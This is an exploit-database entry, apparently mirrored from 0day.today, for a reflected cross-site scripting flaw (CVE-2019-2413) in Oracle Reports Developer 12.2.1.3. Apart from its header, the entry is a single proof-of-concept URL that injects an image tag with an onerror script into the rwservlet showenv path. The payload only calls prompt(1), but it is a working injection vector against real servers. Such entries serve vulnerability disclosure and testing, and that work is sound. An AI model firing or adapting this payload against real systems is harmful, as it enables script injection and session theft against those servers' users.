id: 31991
date: 01/20/2019
title: Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting Vulnerability
author: Mohamed M.Fouad
cves: 

# Exploit Title: [Cross-site Scripting (XSS)]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
# Version: [12.2.1.3] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2019-2413]

POC:

https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E

#  0day.today [2023-03-24]  #